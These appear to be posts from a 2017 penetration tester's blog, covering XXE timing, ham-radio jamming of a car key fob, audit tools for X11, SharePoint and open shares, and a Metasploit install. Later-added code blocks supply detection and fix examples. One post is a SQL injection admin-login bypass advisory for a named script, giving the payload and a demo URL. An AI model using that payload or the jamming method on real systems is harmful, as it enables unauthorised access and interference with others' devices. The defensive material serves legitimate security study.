Sunday, December 3, 2017

DNS cache snooping via Blind XXE based SSRF?

Is this a thing? You tell me.

Say you have an XXE vuln that lets you make HTTP calls only (SSRF) on a pentest. You know it's working only because you see packets over port 80 to a server you control coming from the target system, no data exfil or other fun stuff, so no output of any kind other than server response times. Not much you can do, right? Well, while playing around I noticed the response time was long when I looked for domains that don't exist. So I switched to subdomains of good root domains and saw the same delay... That is DNS cache snooping, yeah? If so it's a newish, kinda worthless attack vector I think. At least I have not seen any papers on it, so it might be new. What do you think?
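One place this kind of probing does leave a trace is the recursive resolver the target uses: the vulnerable host suddenly asks for a burst of distinct names under several parent domains that it never normally touches. Below is an added detection sketch (my code, not part of the original post) that parses BIND-style query log lines, which are constructed here rather than captured, and flags any client that resolves many unique names within a short window. The window size, threshold and the "last two labels" notion of parent domain are assumptions to tune for your own environment.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed BIND-style query log lines (not real traffic). 10.0.0.5 behaves
# normally; 10.0.0.20 resolves a burst of distinct subdomains of several
# parent domains within one second, the pattern a timing probe would leave.
SAMPLE_LOG = """\
03-Dec-2017 10:00:01.101 client 10.0.0.5#51000: query: www.example.com IN A + (10.0.0.2)
03-Dec-2017 10:00:02.240 client 10.0.0.5#51001: query: mail.example.com IN A + (10.0.0.2)
03-Dec-2017 10:00:03.013 client 10.0.0.20#40001: query: cdn.example.net IN A + (10.0.0.2)
03-Dec-2017 10:00:03.120 client 10.0.0.20#40002: query: img.example.net IN A + (10.0.0.2)
03-Dec-2017 10:00:03.215 client 10.0.0.20#40003: query: static.example.net IN A + (10.0.0.2)
03-Dec-2017 10:00:03.330 client 10.0.0.20#40004: query: login.example.org IN A + (10.0.0.2)
03-Dec-2017 10:00:03.410 client 10.0.0.20#40005: query: vpn.example.org IN A + (10.0.0.2)
03-Dec-2017 10:00:03.520 client 10.0.0.20#40006: query: intranet.example.org IN A + (10.0.0.2)
03-Dec-2017 10:00:03.600 client 10.0.0.20#40007: query: portal.example.edu IN A + (10.0.0.2)
03-Dec-2017 10:00:03.710 client 10.0.0.20#40008: query: owa.example.edu IN A + (10.0.0.2)
03-Dec-2017 10:00:03.800 client 10.0.0.20#40009: query: git.example.edu IN A + (10.0.0.2)
03-Dec-2017 10:00:03.900 client 10.0.0.20#40010: query: jira.example.edu IN A + (10.0.0.2)
"""

LINE_RE = re.compile(
    r"^(?P<ts>\d{2}-\w{3}-\d{4} \d{2}:\d{2}:\d{2}\.\d+) "
    r"client (?P<client>[\d.]+)#\d+: query: (?P<qname>\S+) IN (?P<qtype>\S+)"
)


def parse_query_log(text):
    """Yield (timestamp, client, qname) for every line that matches the format."""
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            ts = datetime.strptime(m["ts"], "%d-%b-%Y %H:%M:%S.%f")
            yield ts, m["client"], m["qname"].rstrip(".").lower()


def parent_domain(qname):
    """Last two labels as a rough registrable domain (a real deployment
    would consult the public suffix list instead)."""
    return ".".join(qname.split(".")[-2:])


def find_probing_clients(text, window_seconds=10, min_unique=8):
    """Flag clients that resolve at least min_unique distinct names inside any
    window_seconds span. Returns {client: {"unique_names", "parent_domains"}}."""
    per_client = defaultdict(list)
    for ts, client, qname in parse_query_log(text):
        per_client[client].append((ts, qname))

    flagged = {}
    for client, events in per_client.items():
        events.sort()
        best_names = set()
        for i, (start, _) in enumerate(events):
            names = {q for t, q in events[i:]
                     if (t - start).total_seconds() <= window_seconds}
            if len(names) > len(best_names):
                best_names = names
        if len(best_names) >= min_unique:
            flagged[client] = {
                "unique_names": len(best_names),
                "parent_domains": {parent_domain(n) for n in best_names},
            }
    return flagged


if __name__ == "__main__":
    for client, info in find_probing_clients(SAMPLE_LOG).items():
        print(f"{client}: {info['unique_names']} distinct names across "
              f"{sorted(info['parent_domains'])}")
```

A server that only ever needs a handful of names is the easiest kind of host to baseline, so a simple per-client distinct-name count over a sliding window catches the burst without any knowledge of what the attacker is asking for.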

Tuesday, October 3, 2017

I be Jahamming - Jamming stuff with a Ham radio

So I have been looking at playing around with the HackRF One for a while, and seeing Caleb's talk at DEFCON really got me itching to play, but I was not quite sure where to start. After googling RF/HackRF/GNURadio 101 for a bit, I figured since I already have a Ham radio sitting around I would start with the frequencies available on my Ham and the stuff in my house. This gave me something familiar to start with, since everything was so new with both the HackRF, the software I needed to operate it (GNURadio), RF itself, etc. Here are just a few notes on my experiences so far...

First, a few things to note about the HackRF: it leaks RF all over the spectrum. When I did a sweep of the frequencies my Ham could Rx/Tx on and then listened in on my Ham on the IDed frequencies, it was nothing of importance. So I started a few very professional trial and error methods ("moving around and tapping on the HackRF") and noticed a change in the white noise; then when I unplugged it the Tx stopped. Also, when you Tx on a frequency that the HackRF isn't already leaking on, then stop the program (GNURadio), the HackRF will continue to transmit on that frequency.

On to jamming. The first thing I wanted to mess with was my car. I don't know much about it, but I am guessing it uses a rolling code, so replay was out, but jamming would be OK :) After a quick check of its FCC ID I found the frequency. To my surprise it was in the range of my Ham! The first thing I did was listen to it on my Ham; when I hit the lock button on my fob I could hear little beeps, my car locked, and boy was I excited! So then I keyed up my radio and hit the lock button on my fob again, and this time nothing!! I stopped Tx on my radio and I could once again lock my car. My Ham Tx was more powerful than the fob's Tx, so it was jammed!

Next up was a motorized bed we got a few years back. It has a remote to control the head, foot, and vibrate functions. It does not have an IR LED, so I figured it must be RF. I opened it and there was an FCC ID. Again it was in the range of my radio! After listening to the beeps on my radio and getting a good message, I keyed up my radio and the remote stopped working, lol.

That's all I have for now, but there is more to come on this topic! One thing is for sure, there are way more commercial products using Ham frequencies than I first thought; it should be fun breaking them. I have had a blast so far and look forward to playing with the HackRF and my Ham more! Might make my own bed remote with a doggy style position/mode or something lol! Happy Hacking.


Monday, September 11, 2017

HaX11 released @ BSides STL!

Here is a little Python script I made to aid in pen-testing X11 configurations on IoT and other systems. I also gave a talk on this tool and the type of exposure found in the wild at BSides STL. BSides STL was awesome and I thank everyone involved for the great opportunity! Can't wait until next year.

Get HaX11 @ GitHub

I decided not to share the slides so fuck you for not going to BSides STL :p

Basic usage is "#python hax11.py tar.get.ip.here"
Needs xdotool to work on Kali systems.
More on HaX11 usage to come...
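The exposure HaX11 looks for is an X server whose access control has been switched off (the classic `xhost +`), so that any client on the network can attach to the display. The check below is an added example of how that is verified at the protocol level; it is my code, not HaX11's, and it does nothing a normal X client would not do. A client opens TCP 6000+N for display :N and sends a connection setup request carrying no authorization name or data; the first byte of the server's reply says whether the server accepted it (1), refused it (0) or wants further authentication (2). The two sample replies at the bottom are constructed from the X11 wire format for an offline run, not captured from a real server.

```python
import socket
import struct
import sys

X11_PORT = 6000  # display :0; display :N listens on 6000 + N


def build_setup_request():
    """Connection setup request of a little-endian client that presents no
    authorization protocol or data (name length 0, data length 0)."""
    return struct.pack("<BxHHHHxx", ord("l"), 11, 0, 0, 0)


def parse_setup_reply(data):
    """Interpret the server's setup reply. Status byte 1 means the display
    accepted an unauthenticated client; 0 means refused; 2 means the server
    wants further authentication."""
    if len(data) < 8:
        return "unknown", "reply shorter than the 8-byte header"
    status = data[0]
    major, minor, extra_len = struct.unpack_from("<HHH", data, 2)
    if status == 1:
        # Vendor string length sits at offset 24; the string itself follows the
        # 32-byte fixed part of the success body, i.e. at offset 40.
        if len(data) < 40:
            return "open", f"X11 {major}.{minor}"
        vendor_len = struct.unpack_from("<H", data, 24)[0]
        vendor = data[40:40 + vendor_len].decode("latin-1", "replace")
        return "open", f"X11 {major}.{minor} vendor={vendor!r}"
    if status == 0:
        reason = data[8:8 + data[1]].decode("latin-1", "replace")
        return "denied", reason
    if status == 2:
        reason = data[8:8 + extra_len * 4].decode("latin-1", "replace").rstrip("\0")
        return "auth-required", reason
    return "unknown", f"unexpected status byte {status}"


def check_display(host, port=X11_PORT, timeout=3.0):
    """Connect to host:port, send the setup request and classify the reply."""
    try:
        with socket.create_connection((host, port), timeout=timeout) as s:
            s.sendall(build_setup_request())
            return parse_setup_reply(s.recv(4096))
    except OSError as e:
        return "unreachable", str(e)


# Constructed replies for the offline demonstration (not captured from a server).
FAILED_REPLY = (bytes([0, 21]) + struct.pack("<HHH", 11, 0, 6)
                + b"No protocol specified" + b"\0" * 3)
SUCCESS_REPLY = (bytes([1, 0]) + struct.pack("<HHH", 11, 0, 9)
                 + struct.pack("<IIIIHHBBBBBBBBxxxx", 12000000, 0x400000, 0x3FFFFF,
                               256, 4, 65535, 1, 1, 0, 0, 32, 32, 8, 255)
                 + b"Test")

if __name__ == "__main__":
    if len(sys.argv) > 1:
        print(check_display(sys.argv[1]))
    else:
        print(parse_setup_reply(FAILED_REPLY), parse_setup_reply(SUCCESS_REPLY))
```

Run it against your own devices with `python x11check.py host`; an "open" verdict means the screen, keyboard and clipboard of that display are reachable by anyone who can connect, which is the finding the talk describes. The fix on the device side is to keep access control on (the default `xhost -` state) and to stop the server listening on TCP at all where nothing needs it (`-nolisten tcp`).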

Saturday, August 19, 2017

SharePointSpy released!

Q: What is SharePointSpy?

A: It's a small Chrome extension that checks your access to sensitive areas of SharePoint base and sub sites. It also has some pre-configured search terms that can be used on the base and sub sites to look for files that could have sensitive information. The goal was to make SharePoint audits easier from the auditor's POV.
###
Q: Why?

A: I wanted the ability to audit SharePoint sites. I originally looked at Bishop Fox's SharePoint Hacking Diggity Project but kept having issues and felt it could work better as a Chrome extension and could have more features. So I set out to mimic Bishop Fox's SharePointURLBrute in Chrome, added a few things, and here we are :)
###
Q: Where can I get it?

A: GitHub.

It has a few issues and could use a few more features. 302 redirects break SPS: when it encounters a 302 it just hangs. I would like to be able to scan a site as an anonymous user but I have not figured that one out yet. If you know the secret to either of the above please let me know. That is all I got for now. Happy hacking!
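On the 302 problem: an access checker should never follow redirects, because the redirect is the answer. SharePoint and the SSO front ends in front of it typically answer an unauthorised request with a 302 to a login or access-denied page rather than a bare 401/403, and following it just lands the checker on a login form that returns 200. The added example below (mine, not SharePointSpy's code) shows the classification in Python with the standard library: a redirect handler that refuses to follow, and a verdict function that treats a 3xx toward a login-looking location as "denied". The list of login markers and the `/_layouts/15/` page names are assumptions for a typical on-premises SharePoint; extend them for your tenant.

```python
import urllib.error
import urllib.request
from urllib.parse import urlsplit

# Host/path fragments that SharePoint and common SSO front ends redirect
# unauthorised users to (assumed list; extend it for your environment).
LOGIN_MARKERS = ("login", "signin", "authenticate.aspx", "accessdenied.aspx")


class NoRedirect(urllib.request.HTTPRedirectHandler):
    """Make urllib surface a 3xx as an HTTPError instead of following it."""
    def redirect_request(self, req, fp, code, msg, headers, newurl):
        return None


def classify(status, location=None):
    """Turn a status code (plus the Location header for 3xx) into a verdict."""
    if status == 200:
        return "accessible"
    if status in (401, 403):
        return "denied"
    if status == 404:
        return "missing"
    if status in (301, 302, 303, 307, 308):
        parts = urlsplit(location or "")
        target = (parts.netloc + parts.path).lower()
        if any(marker in target for marker in LOGIN_MARKERS):
            return "denied"
        return "redirect"   # e.g. trailing-slash or site-collection move
    return f"other:{status}"


def probe(url, timeout=10):
    """Request url once, never following redirects, and classify the result."""
    opener = urllib.request.build_opener(NoRedirect)
    try:
        with opener.open(url, timeout=timeout) as resp:
            return classify(resp.status, resp.headers.get("Location"))
    except urllib.error.HTTPError as e:
        # 3xx, 401, 403 and 404 all arrive here once redirects are not followed.
        return classify(e.code, e.headers.get("Location"))


if __name__ == "__main__":
    import sys
    for url in sys.argv[1:]:
        print(url, probe(url))
```

The "redirect" verdict (a 3xx that does not point at a login page) is worth re-probing with the new location once, since SharePoint often 302s `/sites/foo` to `/sites/foo/` before answering; a bounded follow of one hop avoids the hang the post describes.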

Wednesday, July 26, 2017

Make or Break admin login bypass via SQLi

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[x] Type: Admin login bypass via SQLi
[x] Vendor: http://software.friendsinwar.com/
[x] Script Name: Make or Break
[x] Script Version: 1.7
[x] Script DL: http://software.friendsinwar.com/downloads.php?cat_id=2&file_id=9
[x] Author: AnarchyAngel AKA Adam
[x] Mail: anarchy[dot]ang31@gmail[dot]com
[x] More info: https://aahideaway.blogspot.com/
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Navigate to the script's admin login page and submit admin' or ''='-- for the username
and it should give you access to the admin area. A quick release to kick off the DefCon festivities. See you there!

Enjoy >:)

Demo: http://software.friendsinwar.com/scripts_example/make_or_break/index.php
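For anyone maintaining a login like this, the added example below (my code, not the vendor's, using an in-memory SQLite table I construct for the demo) shows why the payload above works and what the fix looks like. The vulnerable function builds its WHERE clause by string concatenation; the quote in the payload closes the username literal and the `or` makes the password comparison irrelevant. The safe function binds the username as a parameter and compares the password hash in code. The table layout, the unsalted SHA-256 hashing and the password value are assumptions to keep the example short.

```python
import hashlib
import hmac
import sqlite3

PAYLOAD = "admin' or ''='--"   # the bypass string from the advisory above


def pw_hash(password):
    # Unsalted SHA-256 only to keep the demo short; a real login should use a
    # salted, slow KDF (PBKDF2, scrypt or argon2).
    return hashlib.sha256(password.encode()).hexdigest()


def make_db():
    """Constructed in-memory user table standing in for the script's admin table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT PRIMARY KEY, password_hash TEXT)")
    conn.execute("INSERT INTO users VALUES (?, ?)", ("admin", pw_hash("correct horse")))
    conn.commit()
    return conn


def login_vulnerable(conn, username, password):
    """Builds the WHERE clause by string concatenation, the pattern behind the
    advisory. With the payload the statement becomes

        ... WHERE username='admin' or ''='--' AND password_hash='<hash>'

    The quote after admin closes the username literal and the remainder is
    parsed as an OR'd second condition (''='--' is merely a false string
    comparison), so the row matches on username alone and the password is
    never checked."""
    sql = (f"SELECT username FROM users WHERE username='{username}' "
           f"AND password_hash='{pw_hash(password)}'")
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def login_safe(conn, username, password):
    """Parameterised lookup by username, then constant-time hash comparison.
    The payload is now just a username that does not exist."""
    row = conn.execute("SELECT password_hash FROM users WHERE username = ?",
                       (username,)).fetchone()
    if row is None or not hmac.compare_digest(row[0], pw_hash(password)):
        return None
    return username


if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", login_vulnerable(db, PAYLOAD, "anything"))   # admin
    print("safe:      ", login_safe(db, PAYLOAD, "anything"))         # None
    print("safe, real:", login_safe(db, "admin", "correct horse"))    # admin
```

Note that the trailing `--` is not even needed for the bypass here: the injected `or` alone detaches the password clause, which is why escaping or blacklisting comment sequences is no substitute for bound parameters.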

Wednesday, July 12, 2017

Introducing Booty Quest!

Booty Quest [BQ] is a little bash script I made to aid in my pen testing activities. While running a pen test I often find a large number of anonymous FTP servers, unsecured SMB shares, and so on, and due to resource restrictions I can't dive any deeper. While these are findings in their own right, it leaves a lot on the bone in my opinion. Finding that these services are also hosting sensitive information could turn a medium finding into a high or critical, depending on the scale you use.

I have seen countless third parties ("pen-test vendors") do the same and pass over looking at the data that is being exposed by the service. There are some tools out there with functions that are somewhat similar, but nothing that does all the heavy lifting of making connections and managing the data like BQ.

So basically you find an anonymous FTP or SMB server, then you just plug in the IP of the host and, in the case of SMB, the share path. BQ will download all the files on the FTP server or mount the SMB share and then use grep and regex to locate IPs, emails, CC#s, SS#s, phone #s, IBANs, usernames, and passwords. If it finds text files and images it will copy them to another location so you can sift over them later.

Basic setup:
After you download the script run:
chmod a+x bq.sh

Here is the basic help:
root@system:~/sec# ./bq.sh 
###########################
# [B]ooty [Q]uest         #
# By Adam Espitia         #
# aahideaway.blogspot.com #
# Arr, matey,             #
#  where be me booty!     #
###########################

This script will mount/download content from a remote host and search it for sensitive information.

Usage here
./bq.sh nfs 192.168.1.1 /share/here/
./bq.sh smb 192.168.1.1 /share/here/
./bq.sh ftp 192.168.1.1
./bq.sh http 192.168.1.1 /dir/path/
./bq.sh local /dir/path/
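The grep-and-regex step is where tools like this earn their keep or drown you in noise, so here is an added example (mine, not bq.sh) of the matching logic with the two checks a practitioner wants: card-number candidates are validated with the Luhn checksum, and IPv4 candidates are validated with `ipaddress` so that strings like 256.1.1.1 are dropped. The sample text is constructed for the demo and contains no real data; the SSN pattern uses the well-known invalid area/group/serial ranges as a rough filter, not an authoritative one.

```python
import ipaddress
import re

# Constructed sample of what a downloaded share might contain (not real data).
SAMPLE = """\
contact: ops-team@example.com, backup host 10.20.30.40 (gw 256.1.1.1 is bogus)
card on file 4111 1111 1111 1111 exp 12/22; typo'd card 4111-1111-1111-1112
ssn-looking 123-45-6789 and a part number 000-00-0000
"""

EMAIL_RE = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}")
IPV4_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
# 13 to 19 digits, optionally separated by single spaces or hyphens.
CARD_RE = re.compile(r"\b(?:\d[ -]?){12,18}\d\b")
# AAA-GG-SSSS with the never-issued area (000, 666, 9xx), group (00) and
# serial (0000) values excluded.
SSN_RE = re.compile(r"\b(?!000|666|9\d\d)\d{3}-(?!00)\d{2}-(?!0000)\d{4}\b")


def luhn_ok(digits):
    """Luhn checksum: double every second digit from the right, sum, mod 10."""
    total = 0
    for i, ch in enumerate(reversed(digits)):
        d = int(ch)
        if i % 2 == 1:
            d *= 2
            if d > 9:
                d -= 9
        total += d
    return total % 10 == 0


def find_cards(text):
    """Return digit strings that look like card numbers and pass Luhn."""
    hits = []
    for m in CARD_RE.finditer(text):
        digits = re.sub(r"[ -]", "", m.group())
        if 13 <= len(digits) <= 19 and luhn_ok(digits):
            hits.append(digits)
    return hits


def find_ipv4(text):
    """Return regex matches that are also syntactically valid IPv4 addresses."""
    out = []
    for m in IPV4_RE.finditer(text):
        try:
            out.append(str(ipaddress.IPv4Address(m.group())))
        except ValueError:
            pass  # e.g. 256.1.1.1 matches the regex but is not an address
    return out


def scan(text):
    """Run every detector over text and return the hits by category."""
    return {
        "emails": EMAIL_RE.findall(text),
        "ipv4": find_ipv4(text),
        "cards": find_cards(text),
        "ssn": SSN_RE.findall(text),
    }


if __name__ == "__main__":
    for category, hits in scan(SAMPLE).items():
        print(f"{category}: {hits}")
```

For a real run you would feed `scan` the contents of each file BQ downloaded (decoding with `errors="replace"` so binaries do not abort the loop) and record file path and line number with every hit, since the evidence for the finding is where the data sits, not just that it exists.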

Friday, June 30, 2017

Installing Metasploit on Debian 9 server

So I recently installed Metasploit on Debian 9, here's how:

apt-get install default-jre default-jdk software-properties-common
add-apt-repository "deb http://ppa.launchpad.net/webupd8team/java/ubuntu xenial main"
apt-get update
apt-get install oracle-java8-installer
apt-get install build-essential libreadline-dev libssl-dev libpq5 libpq-dev libreadline5 libsqlite3-dev libpcap-dev git-core autoconf postgresql pgadmin3 curl zlib1g-dev libxml2-dev libxslt1-dev vncviewer libyaml-dev
curl -sSL https://rvm.io/mpapis.asc | gpg --import -
curl -L https://get.rvm.io | bash -s stable
source /usr/local/rvm/scripts/rvm
echo "source /usr/local/rvm/scripts/rvm" >> ~/.bashrc
source ~/.bashrc
RUBYVERSION=$(wget https://raw.githubusercontent.com/rapid7/metasploit-framework/master/.ruby-version -q -O - )
rvm install $RUBYVERSION
rvm use $RUBYVERSION --default
cd ~
git clone git://github.com/sstephenson/rbenv.git .rbenv
echo 'eval "$(rbenv init -)"' >> ~/.bashrc
exec $SHELL
git clone git://github.com/sstephenson/ruby-build.git ~/.rbenv/plugins/ruby-build
echo 'export PATH="$HOME/.rbenv/plugins/ruby-build/bin:$PATH"' >> ~/.bashrc
git clone git://github.com/dcarley/rbenv-sudo.git ~/.rbenv/plugins/rbenv-sudo
exec $SHELL
RUBYVERSION=$(wget https://raw.githubusercontent.com/rapid7/metasploit-framework/master/.ruby-version -q -O - )
rbenv install $RUBYVERSION
rbenv global $RUBYVERSION
mkdir ~/dev
cd ~/dev
git clone https://github.com/nmap/nmap.git
cd nmap
./configure
make
make install
make clean
su postgres
createuser msf -P -S -R -D
createdb -O msf msf
psql -c "ALTER USER msf WITH ENCRYPTED PASSWORD 'blah';"
exit
cd /opt/
git clone https://github.com/rapid7/metasploit-framework.git
cd metasploit-framework/
rvm --default use ruby-${RUBYVERSION}@metasploit-framework
gem install bundler
bundle install
bash -c 'for MSF in $(ls msf*); do ln -s /opt/metasploit-framework/$MSF /usr/local/bin/$MSF;done'
nano /opt/metasploit-framework/config/database.yml
database.yml contents
production:
 adapter: postgresql
 database: msf
 username: msf
 password: blah
 host: 127.0.0.1
 port: 5432
 pool: 75
 timeout: 5
More cmds...
sh -c "echo export MSF_DATABASE_CONFIG=/opt/metasploit-framework/config/database.yml >> /etc/profile"
source /etc/profile
msfconsole...


Yeah that sucked, but it works!